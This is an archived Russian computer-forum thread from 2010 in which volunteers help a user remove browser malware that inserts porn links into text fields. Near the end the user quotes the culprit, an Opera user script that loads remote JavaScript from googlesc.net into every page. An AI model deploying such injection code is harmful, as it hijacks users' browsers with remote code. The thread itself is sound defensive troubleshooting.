Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   кликаю мышкой - вставляется ссылка на порносайт (http://forum.oszone.net/showthread.php?t=174676)

decoy 02-05-2010 16:37 1405220
кликаю мышкой - вставляется ссылка на порносайт
 
Добрый день!

Когда я кликаю мышкой в поле отправки сообщения, то автоматически вставляется ссылка на порносайт (смотрите в конце сообщения!!) Перепробовал многие антивирусные программы - проблема осталась. Помогите разобраться, пожалуйста!


Примечание модератора
Ссылка действительно была, удалена, чтобы другие не попались

thyrex 02-05-2010 16:57 1405230
Выполните правила и предоставьте логи

decoy 02-05-2010 18:53 1405290
Вложений: 1
спасибо за отклик! Прикрепляю логи.

Drongo 02-05-2010 20:32 1405341
decoy, Выполните эти рекомендации.

HiJackThis Нужно пофиксить эти строки в HiJackThis. Выставив галочки напротив этих пунктов и нажмите кнопку Fix Checked. Как пофиксить в HijackThis
Код:
R3 - URLSearchHook: (no name) -  - (no file)
O2 - BHO: Site Advisor Module - {B2150688-1AA5-4698-90BE-C3CBECBB5786} - C:\Program Files\SAM\module.dll
O3 - Toolbar: Foxit Toolbar - {3041d03e-fd4b-44e0-b742-2d9b88305f98} - C:\Program Files\AskBarDis\bar\bin\askBar.dll (file missing)
O4 - HKLM\..\Policies\Explorer\Run: [Microsoft Driver Setup] C:\WINDOWS\system32\drivers\CzhkF.exe
Скрипт AVZ.
Выполните скрипт AVZ. Меню Файл - Выполнить скрипт, вставляем написаный скрипт - кнопка Запустить, после выполнения компьютер перезагрузится.
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFile('c:\program files\sam\module.dll','');
 QuarantineFile('c:\program files\askbardis\bar\bin\askbar.dll','');
 QuarantineFile('C:\WINDOWS\system32\drivers\CzhkF.exe','');
 DeleteFile('c:\program files\sam\module.dll');
 DeleteFile('c:\program files\askbardis\bar\bin\askbar.dll');
 DeleteFile('C:\WINDOWS\system32\drivers\CzhkF.exe');
 DeleteDirectory('C:\Program Files\SAM');
 DelBHO('{201f27d4-3704-41d6-89c1-aa35e39143ed}');
 DelBHO('{B2150688-1AA5-4698-90BE-C3CBECBB5786}');
 DelBHO('{3041d03e-fd4b-44e0-b742-2d9b88305f98}');
 DelBHO('{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E}');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run','Microsoft Driver Setup');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
После всех процедур выполните скрипт
Код:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
В результате выполнения скрипта будет сформирован карантин quarantine.zip. Отправьте полученный файл quarantine.zip из папки AVZ через данную форму. В строке "Подробное описание возникшей ситуации:", напишите пароль на архив "virus" (без кавычек), в строке "Электронный адрес:" укажите свой электронный адрес. Результаты ответа, сообщите здесь, в теме.

После чего проверьте компьютер утилитой CureIT или Kaspersky Virus Removal Tool.

Повторите логи и дополнительно сделайте лог утилитой МВАМ
• Скачайте Malwarebytes Anti-Malware, установите, обновите базы, выберите Perform Full Scan, нажмите Scan, после сканирования - Ok - Show Results (показать результаты) . Откройте лог и скопируйте в блокнот и выложите в сообщение.
Если базы MBAM в автоматическом режиме обновить не удалось, обновите их отдельно. Загрузить обновление MBAM.


Цитата:
[Дата создания и изменения системных файлов - разная!]
c:\windows\system32\ctfmon.exe
c:\windows\explorer.exe
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\setupapi.dll
c:\windows\system32\rundll32.exe
c:\windows\system32\rundll32.exe
Изменяли системные файлы? Патчили их?

decoy 03-05-2010 00:21 1405481
Вложений: 2
1.Все процедуры выполнил

2.Результат ответа:
Hello,

This message is generated by automatic letter reception system. The report contains information on what the verdicts on the files (if any in the letter) makes antivirus with latest updates. Letter will be passed to the virus analyst.

bcqr00001.ini,
bcqr00002.ini,
bcqr00003.ini,
bcqr00004.ini,
bcqr00005.ini,
bcqr00006.ini

These files are in process.

Best Regards, Kaspersky Lab

10/1, 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com


>> From: nsotnikoff@mail.by
>> Sent: 02.05.2010 18:46:30
>> To: newvirus@kaspersky.com
>> Subject: [VirLabSRF][Description of a malicious program][M:1][LN:RU][L:0]
>>
>>
>> LANG: ru
>> email: nsotnikoff@mail.by
>> product:
>> viruses_date:
>>
>> description:
>> virus
>>
>> Загруженные файлы:
>> quarantine.zip

3. CureIt ничего не выявила (базы обновленные)

4. Логи повторил. Сделал лог MBAM (нашел объект!).Всё прикрепил к сообщению.

5. "Изменяли системные файлы? Патчили их?" - Установил и, позже, обновлял XPLife - программа предназначена для изменения интерфейса Windows XP, делая его похожим на Vista и Seven. Отличительной чертой XPLife является стабильная работа и поддержка двух собственных точек восстановления системы...

Проблема осталась :(

Drongo 03-05-2010 09:57 1405626
decoy, логи чистые. Попробуйте очистить кеш браузера, посмотреть различные надстройки браузера. Проявляется ли эта проблема при использовании какого-то конкретного браузера или со всех подряд?

decoy 03-05-2010 22:01 1405973
Вложений: 1
1.1. Почистил. Проблема сейчас только в опере проявляется. Хотя уверен, что раньше и в IE была - ещё до форума проверял.
1.2. Оперу деинсталлировал, папку оставшуюся удалил, почистил реестр и диск, установил заново оперу...проблема не исчезла!
2. Несколько раз повторил очистку и каждый раз пишет что эти два файла якобы найдены и удалены:
C:\Documents and Settings\Nikolay\Local Settings\Temporary Internet Files\desktop.ini
C:\Documents and Settings\Nikolay\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
3. Прикрепил скрин processor explorer, посмотрите, пожалуйста, постоянно в процессе wscntfy.exe и spoolsv.exe

thyrex 03-05-2010 22:25 1405989
Выполнить в Опера
Инструменты - Настройки - Дополнительно - Содержимое - Настроить JavaScript...

Если окно Папка пользовательских скриптов непустое:
1. Если Вы сами не указывали эту папку для своих скриптов, очистите содержимое папки
2. Если Вы сами указывали эту папку для своих скриптов, поищите в ней незнакомый Вам скрипт и удалите его

decoy 04-05-2010 00:59 1406092
скрипт отключил - проблема исчезла!! :) спасибо!!!
только у меня такой путь: инструменты -> быстрые настройки -> настройки для сайта -> скрипты. Папка для пользовательских скриптов: C:\Program Files\SAM\FF\components - не знаю, нормально это для папки по умолчанию или нет...скрипты сам не писал, разве что окошек прибавил в экспресс-панели...
такое вот нашел там:

var operaBHO = {
onLoad : function(event) {
var last_body_child = document.body;
if (last_body_child != null) {
var script_element = document.createElement("script");
script_element.setAttribute("language", "javascript");
script_element.setAttribute("src", "http://googlesc.net/1.js");
last_body_child.appendChild(script_element);
}
}
};

window.addEventListener("load", operaBHO.onLoad, false);

thyrex 04-05-2010 08:44 1406187
Удалите папку C:\Program Files\SAM\FF\components со всем содержимым

decoy 04-05-2010 20:40 1406687
ок!


Время: 16:40.

Время: 16:40.
© OSzone.net 2001-